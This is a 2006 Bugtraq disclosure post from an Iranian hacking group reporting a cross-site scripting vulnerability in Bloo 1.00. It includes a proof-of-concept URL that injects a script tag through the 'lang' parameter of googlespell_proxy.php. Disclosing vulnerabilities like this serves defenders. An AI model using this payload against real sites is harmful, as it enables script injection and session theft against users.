
Date: 16 Nov 2006 08:53:11 -0000
From: the_3dit0r@...oo.com
To: bugtraq@...urityfocus.com
Subject: Bloo  => 1.00 Cross Site Scripting

"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """ 
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """ 
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
        Xmor$ DigitaL Hacking TeaM


# Bloo  => 1.00 Cross Site Scripting
# Script.............. : Bloo
# Discovered by.... : the_Edit0r	
# Location .......... : Iran
# Class..............  : Xss
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r 
#      D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
#  ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
#   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

# proof Of Concept : 
# Www.Sitename.com/[path]/extensions/googiespell/googlespell_proxy.php?lang="><script>alert('Xmors')</script><



#Contact me : the_3dit0r[at]Yahoo[dot]coM
